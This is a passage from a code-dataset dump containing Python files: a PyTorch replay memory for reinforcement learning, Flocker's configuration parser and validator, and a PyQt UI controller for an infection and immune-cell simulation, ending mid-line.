main(seq_list)\n\n","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"605065747","text":"import torch\nimport numpy as np\nfrom numpy.random import choice\nfrom collections import deque\n\n\n\"\"\"\nThe need for MemoryV2 is due to the following reasons:\n1 > The original experience replay did not account for the termination of the\n    episodes. This creates a problem in our case, where the goal state\n    might be quite different, based on the initial state of the env.\n\n2 > .. ?\n\nThe changes that this structure brings are:\n1 > Memory is a list of episodes and episodes is a list of experiences.\n2 > During sampling, to make it easier for the integration part, make sure to\n    sample sequences of len 'chunk_size' only. 
Nothing less!\n\nv1 constructor inputs:\n    size, symbolic_env, observation_size, action_size, bit_depth, device\n\"\"\"\n\n\ndef postprocess_img(image, depth):\n    \"\"\"\n    Postprocess an image observation for storage.\n    From float32 numpy array [-0.5, 0.5] to uint8 numpy array [0, 255])\n    \"\"\"\n    image = np.floor((image + 0.5) * 2 ** depth)\n    return np.clip(image * 2**(8 - depth), 0, 2**8 - 1).astype(np.uint8)\n\n\ndef preprocess_img(image, depth):\n    \"\"\"\n    Preprocesses an observation inplace.\n    From float32 Tensor [0, 255] to [-0.5, 0.5]\n    \"\"\"\n    image.div_(2 ** (8 - depth)).floor_().div_(2 ** depth).sub_(0.5)\n    image.add_(torch.rand_like(image).div_(2 ** depth))\n\n\nclass Memory:\n    def __init__(self, size, _, observation_size, action_size, bit_depth, device):\n        self.device = device\n        self.action_size = action_size\n        self.observation_size = observation_size\n        self.bit_depth = bit_depth\n        self.data = deque(maxlen=size)\n        self.episode = None\n\n    @property\n    def size(self):\n        return len(self.data)\n\n    def start_episode(self, obs):\n        if self.episode is not None and isinstance(self.episode, Episode):\n            self.data.append(self.episode)\n        self.episode = Episode(self.device, self.bit_depth)\n        self.episode.append_just_obs(obs)\n\n    def append(self, obs, u, r, d):\n        self.episode.append(obs, u, r, d)\n\n    def sample(self, batch_size, tracelen):\n        \"\"\"\n        Make sure to include only episodes with length >= tracelen\n        \"\"\"\n        episode_idx = choice(self.size, batch_size)\n        init_st_idx = [choice(self.data[i].size - tracelen) for i in episode_idx]\n        R = torch.zeros((batch_size, tracelen)).to(self.device)\n        D = torch.zeros((batch_size, tracelen)).to(self.device)\n        U = torch.zeros((batch_size, tracelen, *self.action_size)).to(self.device)\n        X = torch.zeros((batch_size, tracelen, *self.observation_size)).to(self.device)\n        for n, (i, s) in enumerate(zip(episode_idx, init_st_idx)):\n            X[n], U[n], R[n], D[n] = self.data[i].prepare(s, s + tracelen)\n        return X, U, R, D\n\n\nclass Episode:\n    def __init__(self, device, bit_depth):\n        self.device = device\n        self.bit_depth = bit_depth\n        self.clear()\n\n    @property\n    def size(self):\n        return self._size\n\n    def clear(self):\n        self.x = []\n        self.u = []\n        self.d = []\n        self.r = []\n        self._size = 0\n\n    def append(self, x, u, r, d):\n        self._size += 1\n        self.x.append(postprocess_img(x.numpy(), self.bit_depth))\n        self.u.append(u.numpy())\n        self.r.append(r)\n        self.d.append(d)\n\n    def append_just_obs(self, x):\n        self.x.append(postprocess_img(x.numpy(), self.bit_depth))\n\n    def prepare(self, s=0, e=None):\n        e = e or self.size\n        # slice x to the same length as u/r/d so the stacked tensors in Memory.sample line up\n        prossx = torch.tensor(self.x[s:e], dtype=torch.float32, device=self.device)\n        preprocess_img(prossx, self.bit_depth)\n        return (\n            prossx,\n            torch.tensor(self.u[s:e], dtype=torch.float32, device=self.device),\n            torch.tensor(self.r[s:e], dtype=torch.float32, device=self.device),\n            torch.tensor(self.d[s:e], dtype=torch.float32, device=self.device),\n        )\n","sub_path":"memory_v2.py","file_name":"memory_v2.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"174516542","text":"# Copyright Hybrid Logic Ltd. 
See LICENSE file for details.\n# -*- test-case-name: flocker.node.test.test_config -*-\n\n\"\"\"\nAPIs for parsing and validating configuration.\n\"\"\"\n\nfrom __future__ import unicode_literals, absolute_import\n\nimport os\nimport yaml\n\nfrom twisted.python.filepath import FilePath\n\nfrom ._model import (\n Application, AttachedVolume, Deployment,\n DockerImage, Node, Port\n)\n\n\nclass ConfigurationError(Exception):\n \"\"\"\n Some part of the supplied configuration was wrong.\n\n The exception message will include some details about what.\n \"\"\"\n\n\nclass Configuration(object):\n \"\"\"\n Validate and parse configurations.\n \"\"\"\n def __init__(self, lenient=False):\n \"\"\"\n :param bool lenient: If ``True`` don't complain about certain\n deficiencies in the output of ``flocker-reportstate``, In\n particular https://github.com/ClusterHQ/flocker/issues/289 means\n the mountpoint is unknown.\n \"\"\"\n self._lenient = lenient\n\n def _applications_from_configuration(self, application_configuration):\n \"\"\"\n Validate and parse a given application configuration.\n\n :param dict application_configuration: The intermediate configuration\n representation to load into ``Application`` instances. See\n :ref:`Configuration` for details.\n\n :raises ConfigurationError: if there are validation errors.\n\n :returns: A ``dict`` mapping application names to ``Application``\n instances.\n \"\"\"\n if u'applications' not in application_configuration:\n raise ConfigurationError(\"Application configuration has an error. \"\n \"Missing 'applications' key.\")\n\n if u'version' not in application_configuration:\n raise ConfigurationError(\"Application configuration has an error. \"\n \"Missing 'version' key.\")\n\n if application_configuration[u'version'] != 1:\n raise ConfigurationError(\"Application configuration has an error. \"\n \"Incorrect version specified.\")\n\n applications = {}\n for application_name, config in (\n application_configuration['applications'].items()):\n try:\n image_name = config.pop('image')\n except KeyError as e:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config error. \"\n \"Missing value for '{message}'.\").format(\n application_name=application_name, message=e.message)\n )\n\n try:\n image = DockerImage.from_string(image_name)\n except ValueError as e:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config error. \"\n \"Invalid Docker image name. {message}\").format(\n application_name=application_name, message=e.message)\n )\n\n ports = []\n try:\n for port in config.pop('ports', []):\n try:\n internal_port = port.pop('internal')\n except KeyError:\n raise ValueError(\"Missing internal port.\")\n try:\n external_port = port.pop('external')\n except KeyError:\n raise ValueError(\"Missing external port.\")\n\n if port:\n raise ValueError(\n \"Unrecognised keys: {keys}.\".format(\n keys=', '.join(sorted(port.keys()))))\n ports.append(Port(internal_port=internal_port,\n external_port=external_port))\n except ValueError as e:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config error. \"\n \"Invalid ports specification. 
{message}\").format(\n application_name=application_name, message=e.message))\n\n volume = None\n if \"volume\" in config:\n try:\n configured_volume = config.pop('volume')\n try:\n mountpoint = configured_volume['mountpoint']\n except TypeError:\n raise ValueError(\n \"Unexpected value: \" + str(configured_volume)\n )\n except KeyError:\n raise ValueError(\"Missing mountpoint.\")\n\n if not (self._lenient and mountpoint is None):\n if not isinstance(mountpoint, str):\n raise ValueError(\n \"Mountpoint {path} contains non-ASCII \"\n \"(unsupported).\".format(\n path=mountpoint\n )\n )\n if not os.path.isabs(mountpoint):\n raise ValueError(\n \"Mountpoint {path} is not an absolute path.\"\n .format(\n path=mountpoint\n )\n )\n configured_volume.pop('mountpoint')\n if configured_volume:\n raise ValueError(\n \"Unrecognised keys: {keys}.\".format(\n keys=', '.join(sorted(\n configured_volume.keys()))\n ))\n mountpoint = FilePath(mountpoint)\n\n volume = AttachedVolume(\n name=application_name,\n mountpoint=mountpoint\n )\n except ValueError as e:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config \"\n \"error. Invalid volume specification. {message}\")\n .format(\n application_name=application_name,\n message=e.message\n )\n )\n\n applications[application_name] = Application(\n name=application_name,\n image=image,\n volume=volume,\n ports=frozenset(ports))\n\n if config:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config error. \"\n \"Unrecognised keys: {keys}.\").format(\n application_name=application_name,\n keys=', '.join(sorted(config.keys())))\n )\n return applications\n\n def _deployment_from_configuration(self, deployment_configuration,\n all_applications):\n \"\"\"\n Validate and parse a given deployment configuration.\n\n :param dict deployment_configuration: The intermediate configuration\n representation to load into ``Node`` instances. See\n :ref:`Configuration` for details.\n\n :param set all_applications: All applications which should be running\n on all nodes.\n\n :raises ConfigurationError: if there are validation errors.\n\n :returns: A ``set`` of ``Node`` instances.\n \"\"\"\n if 'nodes' not in deployment_configuration:\n raise ConfigurationError(\"Deployment configuration has an error. \"\n \"Missing 'nodes' key.\")\n\n if u'version' not in deployment_configuration:\n raise ConfigurationError(\"Deployment configuration has an error. \"\n \"Missing 'version' key.\")\n\n if deployment_configuration[u'version'] != 1:\n raise ConfigurationError(\"Deployment configuration has an error. \"\n \"Incorrect version specified.\")\n\n nodes = []\n for hostname, application_names in (\n deployment_configuration['nodes'].items()):\n if not isinstance(application_names, list):\n raise ConfigurationError(\n \"Node {node_name} has a config error. \"\n \"Wrong value type: {value_type}. \"\n \"Should be list.\".format(\n node_name=hostname,\n value_type=application_names.__class__.__name__)\n )\n node_applications = []\n for name in application_names:\n application = all_applications.get(name)\n if application is None:\n raise ConfigurationError(\n \"Node {hostname} has a config error. 
\"\n \"Unrecognised application name: \"\n \"{application_name}.\".format(\n hostname=hostname, application_name=name)\n )\n node_applications.append(application)\n node = Node(hostname=hostname,\n applications=frozenset(node_applications))\n nodes.append(node)\n return set(nodes)\n\n def model_from_configuration(self, application_configuration,\n deployment_configuration):\n \"\"\"\n Validate and coerce the supplied application configuration and\n deployment configuration dictionaries into a ``Deployment`` instance.\n\n :param dict application_configuration: Map of applications to Docker\n images.\n\n :param dict deployment_configuration: Map of node names to application\n names.\n\n :raises ConfigurationError: if there are validation errors.\n\n :returns: A ``Deployment`` object.\n \"\"\"\n applications = self._applications_from_configuration(\n application_configuration)\n nodes = self._deployment_from_configuration(\n deployment_configuration, applications)\n return Deployment(nodes=frozenset(nodes))\n\n\nmodel_from_configuration = Configuration().model_from_configuration\n\n\ndef current_from_configuration(current_configuration):\n \"\"\"\n Validate and coerce the supplied current cluster configuration into a\n ``Deployment`` instance.\n\n The passed in configuration is the aggregated output of\n ``configuration_to_yaml`` as combined by ``flocker-deploy``.\n\n :param dict current_configuration: Map of node names to list of\n application maps.\n\n :raises ConfigurationError: if there are validation errors.\n\n :returns: A ``Deployment`` object.\n \"\"\"\n configuration = Configuration(lenient=True)\n nodes = []\n for hostname, applications in current_configuration.items():\n node_applications = configuration._applications_from_configuration(\n applications)\n nodes.append(Node(hostname=hostname,\n applications=frozenset(node_applications.values())))\n return Deployment(nodes=frozenset(nodes))\n\n\ndef configuration_to_yaml(applications):\n \"\"\"\n Generate YAML representation of a node's applications.\n\n A bunch of information is missing, but this is sufficient for the\n initial requirement of determining what to do about volumes when\n applying configuration changes.\n https://github.com/ClusterHQ/flocker/issues/289\n\n :param applications: ``list`` of ``Application``\\ s, typically the\n current configuration on a node as determined by\n ``Deployer.discover_node_configuration()``.\n\n :return: YAML serialized configuration in the application\n configuration format.\n \"\"\"\n result = {}\n for application in applications:\n # XXX image unknown, see\n # https://github.com/ClusterHQ/flocker/issues/207\n result[application.name] = {\"image\": \"unknown\"}\n ports = []\n for port in application.ports:\n ports.append(\n {'internal': port.internal_port,\n 'external': port.external_port}\n )\n result[application.name][\"ports\"] = ports\n if application.volume:\n # Until multiple volumes are supported, assume volume name\n # matches application name, see:\n # https://github.com/ClusterHQ/flocker/issues/49\n result[application.name][\"volume\"] = {\n \"mountpoint\": None,\n }\n return yaml.safe_dump({\"version\": 1, \"applications\": result})\n","sub_path":"flocker/node/_config.py","file_name":"_config.py","file_ext":"py","file_size_in_byte":12793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"122533130","text":"from PyQt4 import QtCore, QtGui\nfrom Logger import GUIConsoleLogger as Log\n\nimport Config\nimport time\n\nfrom 
SimulationVisualization import SimVis\nimport Worldspace\nimport Program\n\nimport sys\n\n\"\"\"\nAuthor(s): Steven Beard\nLast Modified: 28/3/2014\n\"\"\"\n\nclass UIController :\n    \"\"\"\n    UI Controller for the user interface to implement system behaviours triggered by user input\n    Main purpose is for the user to modify the config file values and to run/pause/stop/close the simulation/program (also can reset config to defaults)\n    \"\"\"\n    def __init__(self, program, simvis, queue):\n        \"\"\"\n        Constructor\n        \"\"\"\n        self.program = program\n        self.simVis = simvis\n        self.q = queue\n        self.program.setUIController(self)\n        self.setSimRunning(False)\n\n        self.config = Config.ConfigReader()\n        self.settings = self.config.Read(False)\n\n    def setSimRunning(self, running):\n        \"\"\"\n        Set whether the simulation is currently running\n        \"\"\"\n        self.running = running\n        #print(\"running = \" + str(self.running))\n\n    def setupStartButton(self) :\n        \"\"\"\n        Set the start button behaviour - start the simulation/program if it is not already running\n        \"\"\"\n        if(self.running) :\n            return # don't start another simulation if already running\n\n        #clear the console (and deactivate it - stop scrolling and copying etc - temporary)\n        self.console.setEnabled(False)\n        self.console.clear()\n\n        #update the config file with the parameter values entered in the UI elements\n        try :\n            self.updateConfig()\n            self.settings = self.config.Read(True)\n        except Exception as e:\n            Log.err(e.message)\n            return\n\n        self.setSimRunning(True)\n\n        #initialize the simulation visualization\n        if SimVis.ENABLED and self.program.paused == False:\n            if SimVis.SNAPSHOT_ENABLED:\n                width = SimVis.SNAPSHOT_WIDTH if SimVis.SNAPSHOT_WIDTH <= Worldspace.GRID_WIDTH else Worldspace.GRID_WIDTH\n                height = SimVis.SNAPSHOT_HEIGHT if SimVis.SNAPSHOT_HEIGHT <= Worldspace.GRID_HEIGHT else Worldspace.GRID_HEIGHT\n\n                #simVis = SimVis(width, height, SimVis.SQUARESIZE) # snapshot\n                self.simVis.createWindow(width, height, self.simVis.SQUARESIZE)\n            else:\n                #simVis = SimVis(Worldspace.GRID_WIDTH, Worldspace.GRID_HEIGHT, SimVis.SQUARESIZE) # full sim size\n                self.simVis.createWindow(Worldspace.GRID_WIDTH, Worldspace.GRID_HEIGHT, self.simVis.SQUARESIZE)\n            self.simVis.setTimeMeasurement(\"hours\")\n            self.simVis.setTimeStepsInMeasurement(6.0)\n\n        # start the simulation/program\n        self.program.run(self.settings)\n\n        #thread.start_new_thread(self.program.run, (self.settings,))\n\n        # listen for events triggered by the program thread, executed sequentially using a queue\n        while self.running:\n            #print(\"running = \" + str(self.running))\n            # now the main thread doesn't care what function it's executing.\n            # previously it assumed it was sending the message to display().\n            try :\n                f, args, kwargs = self.q.get_nowait()\n                f(*args, **kwargs)\n                self.q.task_done()\n            except :\n                time.sleep(0.5)\n        #print(\"finished\")\n\n        self.console.setEnabled(True)\n\n    def setupStopButton(self) :\n        \"\"\"\n        Set the stop button behaviour - stop the simulation program\n        \"\"\"\n        self.program.stop()\n\n    def setupDefaultsButton(self) :\n        \"\"\"\n        Set the defaults button behaviour - reset the config file to system defaults and update the ui elements accordingly\n        \"\"\"\n        self.config.reconstruct()\n        self.settings = self.config.Read(True)\n        self.updateUIParameters()\n\n    def setupPauseButton(self) :\n        \"\"\"\n        Set the pause button behaviour - pause the simulation program\n        \"\"\"\n        self.program.pause()\n\n    def setupCloseButton(self) :\n        \"\"\"\n        Set the close button behaviour - close the UI/program\n        \"\"\"\n        
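# Terminate the whole application process immediately.\n        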
sys.exit(0)\n\n def UIinitComplete(self) :\n \"\"\"\n Notification that the UI has finished initializing\n \"\"\"\n return\n\n def updateConfig(self) :\n \"\"\"\n Update the config file based on the current UI element values\n \"\"\"\n b = True\n i = 0\n f = 0.0\n\n i = int(str(self.numberOfRunsTextBox.text()))\n self.settings[\"General\"][\"iNumberOfRuns\"] = i\n b = self.debugTextCheckBoxTrue.isChecked()\n self.settings[\"General\"][\"bDebugTextEnabled\"] = b\n i = int(str(self.runTimeTextBox.text()))\n self.settings[\"General\"][\"iRunTime\"] = i\n\n i = int(str(self.gridWidthTextBox.text()))\n self.settings[\"World\"][\"iGridWidth\"] = i\n i = int(str(self.gridHeightTextBox.text()))\n self.settings[\"World\"][\"iGridHeight\"] = i\n b = self.isToroidalCheckBoxTrue.isChecked()\n self.settings[\"World\"][\"bIsToroidal\"] = b\n\n\n b = self.regenCheckBoxTrue.isChecked()\n self.settings[\"EpithelialSystem\"][\"bRegenEnabled\"] = b\n f = float(str(self.infectInitTextBox.text()))\n self.settings[\"EpithelialSystem\"][\"fInfectInit\"] = f\n b = self.randomAgeCheckBoxTrue.isChecked()\n self.settings[\"EpithelialSystem\"][\"bRandomAge\"] = b\n\n f = float(str(self.infectRateTextBox.text()))\n self.settings[\"EpithelialCell\"][\"fInfectRate\"] = f\n i = int(str(self.divisionTimeTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iDivisionTime\"] = i\n i = int(str(self.infectDelayTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iInfectDelay\"] = i\n i = int(str(self.expressDelayTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iExpressDelay\"] = i\n i = int(str(self.eCellLifespanTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iEpithelialLifespan\"] = i\n i = int(str(self.infectLifespanTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iInfectLifespan\"] = i\n\n #b = self.focusDebugTextCheckBoxTrue.isChecked()\n #self.settings[\"FocusSystem\"][\"bDebugTextEnabled\"] = b\n i = int(str(self.mergeCollisionsTextBox.text()))\n self.settings[\"FocusSystem\"][\"iCollisionsForMergePercentage\"] = i\n b = self.focusSysEnabledCheckBoxTrue.isChecked()\n self.settings[\"FocusSystem\"][\"bIsEnabled_FocusSys\"] = b\n\n f = float(str(self.baseImmCellsTextBox.text()))\n self.settings[\"ImmuneSystem\"][\"fBaseImmCell\"] = f\n f = float(str(self.recruitmentTextBox.text()))\n self.settings[\"ImmuneSystem\"][\"fRecruitment\"] = f\n i = int(str(self.recruitDelayTextBox.text()))\n self.settings[\"ImmuneSystem\"][\"iRecruitDelay\"] = i\n b = self.immSysEnabledCheckBoxTrue.isChecked()\n self.settings[\"ImmuneSystem\"][\"bIsEnabled_ImmSys\"] = b\n\n i = int(self.immCellLifespanTextBox.text())\n self.settings[\"ImmuneCell\"][\"iImmuneLifespan\"] = i\n\n i = int(str(self.snapshotWidthTextBox.text()))\n self.settings[\"SimulationVisualisation\"][\"iSnapshotWidth\"] = i\n i = int(str(self.snapshotHeightTextBox.text()))\n self.settings[\"SimulationVisualisation\"][\"iSnapshotHeight\"] = i\n i = int(str(self.squareSizeTextBox.text()))\n self.settings[\"SimulationVisualisation\"][\"iSquareSize\"] = i\n #b = self.focusIdsCheckBoxTrue.isChecked()\n #self.settings[\"SimulationVisualisation\"][\"bDebugFocusIdEnabled\"] = b\n b = self.snapshotEnabledCheckBoxTrue.isChecked()\n self.settings[\"SimulationVisualisation\"][\"bSnapshotEnabled\"] = b\n b = self.simVisEnabledCheckBoxTrue.isChecked()\n self.settings[\"SimulationVisualisation\"][\"bIsEnabled_SimVis\"] = b\n #b = self.highlightCollisionsCheckBoxTrue.isChecked()\n #self.settings[\"SimulationVisualisation\"][\"bHighlightCollisions\"] = b\n\n b = 
self.showGraphCheckBoxTrue.isChecked()\n self.settings[\"Graph\"][\"bShowGraphOnFinish\"] = b\n\n\n self.config.updateConfigFile(self.settings)\n\n\n def updateUIParameters(self) :\n \"\"\"\n Update all of the UI elements based on current config file values\n \"\"\"\n self.setNumberOfRuns()\n self.setDebugTextEnabled()\n self.setRunTime()\n self.setGridWidth()\n self.setGridHeight()\n self.setIsToroidal()\n self.setRegenEnabled()\n self.setRandomAgeEnabled()\n self.setInfectInit()\n self.setInfectRate()\n self.setDivisionTime()\n self.setExpressDelay()\n self.setECellLifespan()\n self.setInfectLifespan()\n #self.setFocusDebugTextEnabled()\n self.setMergeCollisions()\n self.setFocusSysEnabled()\n self.setBaseImmCells()\n self.setRecruitment()\n self.setRecruitDelay()\n self.setImmSysEnabled()\n self.setImmCellLifespan()\n self.setSnapshotWidth()\n self.setSnapshotHeight()\n self.setSquareSize()\n #self.setFocusIds()\n self.setSnapshotEnabled()\n self.setSimVisEnabled()\n #self.setHighlightCollisions()\n self.setShowGraph()\n\n\n\n\n \"\"\"\n The Following Methods:\n 1. Setting the listeners for UI elements (text/number inputs for parameters or parameter checkboxes).\n 2. Updating the UI elements based on current config file values\n \"\"\"\n\n def setNumberOfRunsInput(self, textbox) :\n self.numberOfRunsTextBox = textbox\n self.setNumberOfRuns()\n\n def setNumberOfRuns(self) :\n value = self.settings[\"General\"][\"iNumberOfRuns\"]\n self.numberOfRunsTextBox.setText(str(value))\n\n def setDebugTextEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.debugTextCheckBoxTrue = checkboxTrue\n self.debugTextCheckBoxFalse = checkboxFalse\n self.setDebugTextEnabled()\n\n def setDebugTextEnabled(self) :\n isOn = self.settings[\"General\"][\"bDebugTextEnabled\"]\n self.debugTextCheckBoxTrue.setChecked(isOn)\n self.debugTextCheckBoxFalse.setChecked((isOn == False))\n\n def setRunTimeInput(self, textbox) :\n self.runTimeTextBox = textbox\n self.setRunTime()\n\n def setRunTime(self) :\n value = self.settings[\"General\"][\"iRunTime\"]\n self.runTimeTextBox.setText(str(value))\n\n def setGridWidthInput(self, textbox) :\n self.gridWidthTextBox = textbox\n self.setGridWidth()\n\n def setGridWidth(self) :\n value = self.settings[\"World\"][\"iGridWidth\"]\n self.gridWidthTextBox.setText(str(value))\n\n def setGridHeightInput(self, textbox) :\n self.gridHeightTextBox = textbox\n self.setGridHeight()\n\n def setGridHeight(self) :\n value = self.settings[\"World\"][\"iGridHeight\"]\n self.gridHeightTextBox.setText(str(value))\n\n def setIsToroidalCheckBox(self, checkboxTrue, checkboxFalse) :\n self.isToroidalCheckBoxTrue = checkboxTrue\n self.isToroidalCheckBoxFalse = checkboxFalse\n self.setIsToroidal()\n\n def setIsToroidal(self) :\n isOn = self.settings[\"World\"][\"bIsToroidal\"]\n self.isToroidalCheckBoxTrue.setChecked(isOn)\n self.isToroidalCheckBoxFalse.setChecked((isOn == False))\n\n def setRegenEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.regenCheckBoxTrue = checkboxTrue\n self.regenCheckBoxFalse = checkboxFalse\n self.setRegenEnabled()\n\n def setRegenEnabled(self) :\n isOn = self.settings[\"EpithelialSystem\"][\"bRegenEnabled\"]\n self.regenCheckBoxTrue.setChecked(isOn)\n self.regenCheckBoxFalse.setChecked((isOn == False))\n\n def setRandomAgeEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.randomAgeCheckBoxTrue = checkboxTrue\n self.randomAgeCheckBoxFalse = checkboxFalse\n self.setRandomAgeEnabled()\n\n def setRandomAgeEnabled(self) :\n isOn = 
self.settings[\"EpithelialSystem\"][\"bRandomAge\"]\n self.randomAgeCheckBoxTrue.setChecked(isOn)\n self.randomAgeCheckBoxFalse.setChecked((isOn == False))\n\n def setInfectInitInput(self, textbox) :\n self.infectInitTextBox = textbox\n self.setInfectInit()\n\n def setInfectInit(self) :\n value = self.settings[\"EpithelialSystem\"][\"fInfectInit\"]\n self.infectInitTextBox.setText(str(value))\n\n def setInfectRateInput(self, textbox) :\n self.infectRateTextBox = textbox\n self.setInfectRate()\n\n def setInfectRate(self) :\n value = self.settings[\"EpithelialCell\"][\"fInfectRate\"]\n self.infectRateTextBox.setText(str(value))\n\n def setDivisionTimeInput(self, textbox) :\n self.divisionTimeTextBox = textbox\n self.setDivisionTime()\n\n def setDivisionTime(self) :\n value = self.settings[\"EpithelialCell\"][\"iDivisionTime\"]\n self.divisionTimeTextBox.setText(str(value))\n\n def setInfectDelayInput(self, textbox) :\n self.infectDelayTextBox = textbox\n self.setInfectDelay()\n\n def setInfectDelay(self) :\n value = self.settings[\"EpithelialCell\"][\"iInfectDelay\"]\n self.infectDelayTextBox.setText(str(value))\n\n def setExpressDelayInput(self, textbox) :\n self.expressDelayTextBox = textbox\n self.setExpressDelay()\n\n def setExpressDelay(self) :\n value = self.settings[\"EpithelialCell\"][\"iExpressDelay\"]\n self.expressDelayTextBox.setText(str(value))\n\n def setECellLifespanInput(self, textbox) :\n self.eCellLifespanTextBox = textbox\n self.setECellLifespan()\n\n def setECellLifespan(self) :\n value = self.settings[\"EpithelialCell\"][\"iEpithelialLifespan\"]\n self.eCellLifespanTextBox.setText(str(value))\n\n def setInfectLifespanInput(self, textbox) :\n self.infectLifespanTextBox = textbox\n self.setInfectLifespan()\n\n def setInfectLifespan(self) :\n value = self.settings[\"EpithelialCell\"][\"iInfectLifespan\"]\n self.infectLifespanTextBox.setText(str(value))\n\n #def setFocusDebugTextEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n # self.focusDebugTextCheckBoxTrue = checkboxTrue\n # self.focusDebugTextCheckBoxFalse = checkboxFalse\n # self.setFocusDebugTextEnabled()\n\n #def setFocusDebugTextEnabled(self) :\n # isOn = self.settings[\"FocusSystem\"][\"bDebugTextEnabled\"]\n # self.focusDebugTextCheckBoxTrue.setChecked(isOn)\n # self.focusDebugTextCheckBoxFalse.setChecked((isOn == False)) \n\n def setMergeCollisionsInput(self, textbox) :\n self.mergeCollisionsTextBox = textbox\n self.setMergeCollisions()\n\n def setMergeCollisions(self) :\n value = self.settings[\"FocusSystem\"][\"iCollisionsForMergePercentage\"]\n self.mergeCollisionsTextBox.setText(str(value))\n\n def setFocusSysEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.focusSysEnabledCheckBoxTrue = checkboxTrue\n self.focusSysEnabledCheckBoxFalse = checkboxFalse\n self.setFocusSysEnabled()\n\n def setFocusSysEnabled(self) :\n isOn = self.settings[\"FocusSystem\"][\"bIsEnabled_FocusSys\"]\n self.focusSysEnabledCheckBoxTrue.setChecked(isOn)\n self.focusSysEnabledCheckBoxFalse.setChecked((isOn == False)) \n\n def setBaseImmCellsInput(self, textbox) :\n self.baseImmCellsTextBox = textbox\n self.setBaseImmCells()\n\n def setBaseImmCells(self) :\n value = self.settings[\"ImmuneSystem\"][\"fBaseImmCell\"]\n self.baseImmCellsTextBox.setText(str(value))\n\n def setRecruitmentInput(self, textbox) :\n self.recruitmentTextBox = textbox\n self.setRecruitment()\n\n def setRecruitment(self) :\n value = self.settings[\"ImmuneSystem\"][\"fRecruitment\"]\n self.recruitmentTextBox.setText(str(value))\n\n def 
setRecruitDelayInput(self, textbox) :\n self.recruitDelayTextBox = textbox\n self.setRecruitDelay()\n\n def setRecruitDelay(self) :\n value = self.settings[\"ImmuneSystem\"][\"iRecruitDelay\"]\n self.recruitDelayTextBox.setText(str(value))\n\n def setImmSysEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.immSysEnabledCheckBoxTrue = checkboxTrue\n self.immSysEnabledCheckBoxFalse = checkboxFalse\n self.setImmSysEnabled()\n\n def setImmSysEnabled(self) :\n isOn = self.settings[\"ImmuneSystem\"][\"bIsEnabled_ImmSys\"]\n self.immSysEnabledCheckBoxTrue.setChecked(isOn)\n self.immSysEnabledCheckBoxFalse.setChecked((isOn == False)) \n\n def setImmCellLifespanInput(self, textbox) :\n self.immCellLifespanTextBox = textbox\n self.setImmCellLifespan()\n\n def setImmCellLifespan(self) :\n value = self.settings[\"ImmuneCell\"][\"iImmuneLifespan\"]\n self.immCellLifespanTextBox.setText(str(value))\n\n def setSnapshotWidthInput(self, textbox) :\n self.snapshotWidthTextBox = textbox\n self.setSnapshotWidth()\n\n def setSnapshotWidth(self) :\n value = self.settings[\"SimulationVisualisation\"][\"iSnapshotWidth\"]\n self.snapshotWidthTextBox.setText(str(value))\n\n def setSnapshotHeightInput(self, textbox) :\n self.snapshotHeightTextBox = textbox\n self.setSnapshotHeight()\n\n def setSnapshotHeight(self) :\n value = self.settings[\"SimulationVisualisation\"][\"iSnapshotHeight\"]\n self.snapshotHeightTextBox.setText(str(value))\n\n def setSquareSizeInput(self, textbox) :\n self.squareSizeTextBox = textbox\n self.setSquareSize()\n\n def setSquareSize(self) :\n value = self.settings[\"SimulationVisualisation\"][\"iSquareSize\"]\n self.squareSizeTextBox.setText(str(value))\n\n #def setFocusIdsCheckBox(self, checkboxTrue, checkboxFalse) :\n # self.focusIdsCheckBoxTrue = checkboxTrue\n # self.focusIdsCheckBoxFalse = checkboxFalse\n # self.setFocusIds()\n\n #def setFocusIds(self) :\n # isOn = self.settings[\"SimulationVisualisation\"][\"bDebugFocusIdEnabled\"]\n # self.focusIdsCheckBoxTrue.setChecked(isOn)\n # self.focusIdsCheckBoxFalse.setChecked((isOn == False)) \n\n def setSnapshotEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.snapshotEnabledCheckBoxTrue = checkboxTrue\n self.snapshotEnabledCheckBoxFalse = checkboxFalse\n self.setSnapshotEnabled()\n\n def setSnapshotEnabled(self) :\n isOn = self.settings[\"SimulationVisualisation\"][\"bSnapshotEnabled\"]\n self.snapshotEnabledCheckBoxTrue.setChecked(isOn)\n self.snapshotEnabledCheckBoxFalse.setChecked((isOn == False)) \n\n def setSimVisEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.simVisEnabledCheckBoxTrue = checkboxTrue\n self.simVisEnabledCheckBoxFalse = checkboxFalse\n self.setSimVisEnabled()\n\n def setSimVisEnabled(self) :\n isOn = self.settings[\"SimulationVisualisation\"][\"bIsEnabled_SimVis\"]\n self.simVisEnabledCheckBoxTrue.setChecked(isOn)\n self.simVisEnabledCheckBoxFalse.setChecked((isOn == False)) \n\n #def setHighlightCollisionsCheckBox(self, checkboxTrue, checkboxFalse) :\n # self.highlightCollisionsCheckBoxTrue = checkboxTrue\n # self.highlightCollisionsCheckBoxFalse = checkboxFalse\n # self.setHighlightCollisions()\n\n #def setHighlightCollisions(self) :\n # isOn = self.settings[\"SimulationVisualisation\"][\"bHighlightCollisions\"]\n # self.highlightCollisionsCheckBoxTrue.setChecked(isOn)\n # self.highlightCollisionsCheckBoxFalse.setChecked((isOn == False)) \n\n def setShowGraphCheckBox(self, 